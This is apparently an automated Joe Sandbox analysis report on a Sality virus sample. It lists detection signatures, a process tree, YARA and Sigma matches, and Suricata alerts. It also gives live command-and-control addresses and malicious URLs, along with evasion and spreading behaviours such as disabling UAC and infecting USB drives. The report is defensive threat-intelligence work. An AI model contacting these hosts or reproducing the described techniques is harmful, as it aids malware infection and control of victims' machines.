Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RHxJqGoGFB.exe

Overview

General Information

Sample name:RHxJqGoGFB.exe
renamed because original name is a hash value
Original sample name:2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd.exe
Analysis ID:1563008
MD5:4f7fa0b66a6e153089ab00199b04356b
SHA1:7c2a6d1a21501502e2186ca493a1069909bba703
SHA256:2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd
Tags:86-104-74-51exeuser-JAMESWT_MHT
Infos:

Detection

Sality
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found stalling execution ending in API Sleep call
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Connects to several IPs in different countries
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RHxJqGoGFB.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\RHxJqGoGFB.exe" MD5: 4F7FA0B66A6E153089AB00199B04356B)
    • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • ShellExperienceHost.exe (PID: 7460 cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca MD5: 9B8DE9D4EDF68EEF2C1E490ABC291567)
    • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • RuntimeBroker.exe (PID: 7732 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
    • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ctfmon.exe (PID: 3832 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
    • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
    • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
    • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
    • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
    • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
    • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
    • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
    • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
    • svchost.exe (PID: 4600 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dllhost.exe (PID: 2288 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeBroker.exe (PID: 3548 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 5000 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 3632 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5728 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5100 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5296 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 2336 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5984 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 2564 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 3604 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SalityF-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.InfectionSality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.PayloadOnce installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
  • Salty Spider
https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: RHxJqGoGFB.exe PID: 7300JoeSecurity_SalityYara detected SalityJoe Security
    SourceRuleDescriptionAuthorStrings
    0.2.RHxJqGoGFB.exe.8f0cc4.9.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
    • 0x185c:$s1: Simple Poly Engine v
    0.2.RHxJqGoGFB.exe.8c0d78.6.unpackJoeSecurity_SalityYara detected SalityJoe Security
      0.2.RHxJqGoGFB.exe.8c0d78.6.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
      • 0x317a8:$s1: Simple Poly Engine v
      0.2.RHxJqGoGFB.exe.8d0000.8.unpackJoeSecurity_SalityYara detected SalityJoe Security
        0.2.RHxJqGoGFB.exe.8d0000.8.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x22520:$s1: Simple Poly Engine v

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RHxJqGoGFB.exe", ParentImage: C:\Users\user\Desktop\RHxJqGoGFB.exe, ParentProcessId: 7300, ParentProcessName: RHxJqGoGFB.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe
        Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RHxJqGoGFB.exe, ProcessId: 7300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RHxJqGoGFB.exe", ParentImage: C:\Users\user\Desktop\RHxJqGoGFB.exe, ParentProcessId: 7300, ParentProcessName: RHxJqGoGFB.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-26T11:42:11.899329+010020183401Malware Command and Control Activity Detected192.168.2.44973246.105.103.21980TCP
        2024-11-26T11:42:16.743004+010020183401Malware Command and Control Activity Detected192.168.2.44973546.105.103.21980TCP
        2024-11-26T11:42:21.684084+010020183401Malware Command and Control Activity Detected192.168.2.44973746.105.103.21980TCP
        2024-11-26T11:42:26.565787+010020183401Malware Command and Control Activity Detected192.168.2.44974246.105.103.21980TCP
        2024-11-26T11:42:31.368788+010020183401Malware Command and Control Activity Detected192.168.2.44974546.105.103.21980TCP
        2024-11-26T11:42:36.200224+010020183401Malware Command and Control Activity Detected192.168.2.44974646.105.103.21980TCP
        2024-11-26T11:42:41.050525+010020183401Malware Command and Control Activity Detected192.168.2.44974746.105.103.21980TCP
        2024-11-26T11:42:45.964254+010020183401Malware Command and Control Activity Detected192.168.2.44974846.105.103.21980TCP
        2024-11-26T11:42:50.728667+010020183401Malware Command and Control Activity Detected192.168.2.44974946.105.103.21980TCP
        2024-11-26T11:42:55.543033+010020183401Malware Command and Control Activity Detected192.168.2.44975046.105.103.21980TCP
        2024-11-26T11:43:00.519992+010020183401Malware Command and Control Activity Detected192.168.2.44975246.105.103.21980TCP
        2024-11-26T11:43:05.291200+010020183401Malware Command and Control Activity Detected192.168.2.44975946.105.103.21980TCP
        2024-11-26T11:43:10.085351+010020183401Malware Command and Control Activity Detected192.168.2.44977446.105.103.21980TCP
        2024-11-26T11:43:14.964564+010020183401Malware Command and Control Activity Detected192.168.2.44978646.105.103.21980TCP
        2024-11-26T11:43:19.753858+010020183401Malware Command and Control Activity Detected192.168.2.44979746.105.103.21980TCP
        2024-11-26T11:43:24.934464+010020183401Malware Command and Control Activity Detected192.168.2.44980846.105.103.21980TCP
        2024-11-26T11:43:30.379426+010020183401Malware Command and Control Activity Detected192.168.2.44981946.105.103.21980TCP
        2024-11-26T11:43:35.273608+010020183401Malware Command and Control Activity Detected192.168.2.44983446.105.103.21980TCP
        2024-11-26T11:43:40.463057+010020183401Malware Command and Control Activity Detected192.168.2.44984646.105.103.21980TCP
        2024-11-26T11:43:45.715241+010020183401Malware Command and Control Activity Detected192.168.2.44985746.105.103.21980TCP
        2024-11-26T11:43:50.655396+010020183401Malware Command and Control Activity Detected192.168.2.44986846.105.103.21980TCP
        2024-11-26T11:43:55.459153+010020183401Malware Command and Control Activity Detected192.168.2.44988046.105.103.21980TCP
        2024-11-26T11:44:00.276318+010020183401Malware Command and Control Activity Detected192.168.2.44989146.105.103.21980TCP
        2024-11-26T11:44:05.354825+010020183401Malware Command and Control Activity Detected192.168.2.44990246.105.103.21980TCP
        2024-11-26T11:44:11.156348+010020183401Malware Command and Control Activity Detected192.168.2.44991446.105.103.21980TCP
        2024-11-26T11:44:16.040513+010020183401Malware Command and Control Activity Detected192.168.2.44992546.105.103.21980TCP
        2024-11-26T11:44:20.885968+010020183401Malware Command and Control Activity Detected192.168.2.44994046.105.103.21980TCP
        2024-11-26T11:44:25.781545+010020183401Malware Command and Control Activity Detected192.168.2.44995146.105.103.21980TCP
        2024-11-26T11:44:30.615302+010020183401Malware Command and Control Activity Detected192.168.2.44996246.105.103.21980TCP
        2024-11-26T11:44:35.444529+010020183401Malware Command and Control Activity Detected192.168.2.44997346.105.103.21980TCP
        2024-11-26T11:44:40.366730+010020183401Malware Command and Control Activity Detected192.168.2.44998446.105.103.21980TCP
        2024-11-26T11:44:45.244056+010020183401Malware Command and Control Activity Detected192.168.2.44999546.105.103.21980TCP
        2024-11-26T11:44:50.147625+010020183401Malware Command and Control Activity Detected192.168.2.45000646.105.103.21980TCP
        2024-11-26T11:44:55.298067+010020183401Malware Command and Control Activity Detected192.168.2.45001946.105.103.21980TCP
        2024-11-26T11:45:00.538110+010020183401Malware Command and Control Activity Detected192.168.2.45003246.105.103.21980TCP
        2024-11-26T11:45:05.399094+010020183401Malware Command and Control Activity Detected192.168.2.45004246.105.103.21980TCP
        2024-11-26T11:45:10.307722+010020183401Malware Command and Control Activity Detected192.168.2.45004346.105.103.21980TCP
        2024-11-26T11:45:15.407489+010020183401Malware Command and Control Activity Detected192.168.2.45004446.105.103.21980TCP
        2024-11-26T11:45:20.712933+010020183401Malware Command and Control Activity Detected192.168.2.45004546.105.103.21980TCP
        2024-11-26T11:45:25.593889+010020183401Malware Command and Control Activity Detected192.168.2.45004646.105.103.21980TCP
        2024-11-26T11:45:30.698514+010020183401Malware Command and Control Activity Detected192.168.2.45004746.105.103.21980TCP
        2024-11-26T11:45:35.698392+010020183401Malware Command and Control Activity Detected192.168.2.45004846.105.103.21980TCP
        2024-11-26T11:45:41.155369+010020183401Malware Command and Control Activity Detected192.168.2.45004946.105.103.21980TCP
        2024-11-26T11:45:46.228245+010020183401Malware Command and Control Activity Detected192.168.2.45005046.105.103.21980TCP
        2024-11-26T11:45:51.090228+010020183401Malware Command and Control Activity Detected192.168.2.45005146.105.103.21980TCP
        2024-11-26T11:45:56.062306+010020183401Malware Command and Control Activity Detected192.168.2.45005246.105.103.21980TCP
        2024-11-26T11:46:00.949414+010020183401Malware Command and Control Activity Detected192.168.2.45005346.105.103.21980TCP
        2024-11-26T11:46:05.871611+010020183401Malware Command and Control Activity Detected192.168.2.45005446.105.103.21980TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-26T11:42:11.899329+010028032702Potentially Bad Traffic192.168.2.44973246.105.103.21980TCP
        2024-11-26T11:42:16.743004+010028032702Potentially Bad Traffic192.168.2.44973546.105.103.21980TCP
        2024-11-26T11:42:21.684084+010028032702Potentially Bad Traffic192.168.2.44973746.105.103.21980TCP
        2024-11-26T11:42:26.565787+010028032702Potentially Bad Traffic192.168.2.44974246.105.103.21980TCP
        2024-11-26T11:42:31.368788+010028032702Potentially Bad Traffic192.168.2.44974546.105.103.21980TCP
        2024-11-26T11:42:36.200224+010028032702Potentially Bad Traffic192.168.2.44974646.105.103.21980TCP
        2024-11-26T11:42:41.050525+010028032702Potentially Bad Traffic192.168.2.44974746.105.103.21980TCP
        2024-11-26T11:42:45.964254+010028032702Potentially Bad Traffic192.168.2.44974846.105.103.21980TCP
        2024-11-26T11:42:50.728667+010028032702Potentially Bad Traffic192.168.2.44974946.105.103.21980TCP
        2024-11-26T11:42:55.543033+010028032702Potentially Bad Traffic192.168.2.44975046.105.103.21980TCP
        2024-11-26T11:43:00.519992+010028032702Potentially Bad Traffic192.168.2.44975246.105.103.21980TCP
        2024-11-26T11:43:05.291200+010028032702Potentially Bad Traffic192.168.2.44975946.105.103.21980TCP
        2024-11-26T11:43:10.085351+010028032702Potentially Bad Traffic192.168.2.44977446.105.103.21980TCP
        2024-11-26T11:43:14.964564+010028032702Potentially Bad Traffic192.168.2.44978646.105.103.21980TCP
        2024-11-26T11:43:19.753858+010028032702Potentially Bad Traffic192.168.2.44979746.105.103.21980TCP
        2024-11-26T11:43:24.934464+010028032702Potentially Bad Traffic192.168.2.44980846.105.103.21980TCP
        2024-11-26T11:43:30.379426+010028032702Potentially Bad Traffic192.168.2.44981946.105.103.21980TCP
        2024-11-26T11:43:35.273608+010028032702Potentially Bad Traffic192.168.2.44983446.105.103.21980TCP
        2024-11-26T11:43:40.463057+010028032702Potentially Bad Traffic192.168.2.44984646.105.103.21980TCP
        2024-11-26T11:43:45.715241+010028032702Potentially Bad Traffic192.168.2.44985746.105.103.21980TCP
        2024-11-26T11:43:50.655396+010028032702Potentially Bad Traffic192.168.2.44986846.105.103.21980TCP
        2024-11-26T11:43:55.459153+010028032702Potentially Bad Traffic192.168.2.44988046.105.103.21980TCP
        2024-11-26T11:44:00.276318+010028032702Potentially Bad Traffic192.168.2.44989146.105.103.21980TCP
        2024-11-26T11:44:05.354825+010028032702Potentially Bad Traffic192.168.2.44990246.105.103.21980TCP
        2024-11-26T11:44:11.156348+010028032702Potentially Bad Traffic192.168.2.44991446.105.103.21980TCP
        2024-11-26T11:44:16.040513+010028032702Potentially Bad Traffic192.168.2.44992546.105.103.21980TCP
        2024-11-26T11:44:20.885968+010028032702Potentially Bad Traffic192.168.2.44994046.105.103.21980TCP
        2024-11-26T11:44:25.781545+010028032702Potentially Bad Traffic192.168.2.44995146.105.103.21980TCP
        2024-11-26T11:44:30.615302+010028032702Potentially Bad Traffic192.168.2.44996246.105.103.21980TCP
        2024-11-26T11:44:35.444529+010028032702Potentially Bad Traffic192.168.2.44997346.105.103.21980TCP
        2024-11-26T11:44:40.366730+010028032702Potentially Bad Traffic192.168.2.44998446.105.103.21980TCP
        2024-11-26T11:44:45.244056+010028032702Potentially Bad Traffic192.168.2.44999546.105.103.21980TCP
        2024-11-26T11:44:50.147625+010028032702Potentially Bad Traffic192.168.2.45000646.105.103.21980TCP
        2024-11-26T11:44:55.298067+010028032702Potentially Bad Traffic192.168.2.45001946.105.103.21980TCP
        2024-11-26T11:45:00.538110+010028032702Potentially Bad Traffic192.168.2.45003246.105.103.21980TCP
        2024-11-26T11:45:05.399094+010028032702Potentially Bad Traffic192.168.2.45004246.105.103.21980TCP
        2024-11-26T11:45:10.307722+010028032702Potentially Bad Traffic192.168.2.45004346.105.103.21980TCP
        2024-11-26T11:45:15.407489+010028032702Potentially Bad Traffic192.168.2.45004446.105.103.21980TCP
        2024-11-26T11:45:20.712933+010028032702Potentially Bad Traffic192.168.2.45004546.105.103.21980TCP
        2024-11-26T11:45:25.593889+010028032702Potentially Bad Traffic192.168.2.45004646.105.103.21980TCP
        2024-11-26T11:45:30.698514+010028032702Potentially Bad Traffic192.168.2.45004746.105.103.21980TCP
        2024-11-26T11:45:35.698392+010028032702Potentially Bad Traffic192.168.2.45004846.105.103.21980TCP
        2024-11-26T11:45:41.155369+010028032702Potentially Bad Traffic192.168.2.45004946.105.103.21980TCP
        2024-11-26T11:45:46.228245+010028032702Potentially Bad Traffic192.168.2.45005046.105.103.21980TCP
        2024-11-26T11:45:51.090228+010028032702Potentially Bad Traffic192.168.2.45005146.105.103.21980TCP
        2024-11-26T11:45:56.062306+010028032702Potentially Bad Traffic192.168.2.45005246.105.103.21980TCP
        2024-11-26T11:46:00.949414+010028032702Potentially Bad Traffic192.168.2.45005346.105.103.21980TCP
        2024-11-26T11:46:05.871611+010028032702Potentially Bad Traffic192.168.2.45005446.105.103.21980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: RHxJqGoGFB.exeAvira: detected
        Source: http://46.105.103.219/sobakavolos.gif?53792577=-1494070546Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?10c254e3=1687027026Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?16620ca3=1502098060Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?1a7967a=83280750Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?d0255c4e=-1325038046Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?247d6b5=76524906Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?8756340a=-1778213858Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?c1fee9b0=267865472Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?ee5adceb=1926686552Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?b4156853=1747636390dAvira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?d7244def=-503438967Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?590aff39=-1307181454Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?4c8fe82=722530962C$Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?a74235ca=-343063876Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?d42c48fe=-1470590468Avira URL Cloud: Label: malware
        Source: http://kukutrustnet987.info/home.gifAvira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?2e864a2=146353638cAvira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?c535894d=349578548Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?e7c0a656=226918236Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?7ccb59f9=1986137579Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?55ce57c=359896560p$WAvira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360zAvira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/DisableTaskMgrSoftwareAvira URL Cloud: Label: phishing
        Source: http://46.105.103.219/sobakavolos.gif?eaf3a57c=-2118786840Avira URL Cloud: Label: malware
        Source: http://46.105.103.219/sobakavolos.gif?7e81b91=530607684Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Temp\odnhm.exeAvira: detection malicious, Label: W32/Sality.AT
        Source: C:\clmaq.pifAvira: detection malicious, Label: W32/Sality.AT
        Source: C:\Users\user\AppData\Local\Temp\rkuso.exeAvira: detection malicious, Label: W32/Sality.AT
        Source: RHxJqGoGFB.exeReversingLabs: Detection: 94%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\odnhm.exeJoe Sandbox ML: detected
        Source: C:\clmaq.pifJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\rkuso.exeJoe Sandbox ML: detected
        Source: RHxJqGoGFB.exeJoe Sandbox ML: detected
        Source: RHxJqGoGFB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

        Spreading

        barindex
        Source: Yara matchFile source: 0.2.RHxJqGoGFB.exe.8c0d78.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHxJqGoGFB.exe.8d0000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: RHxJqGoGFB.exe PID: 7300, type: MEMORYSTR
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile created: C:\autorun.infJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile opened: u:Jump to behavior
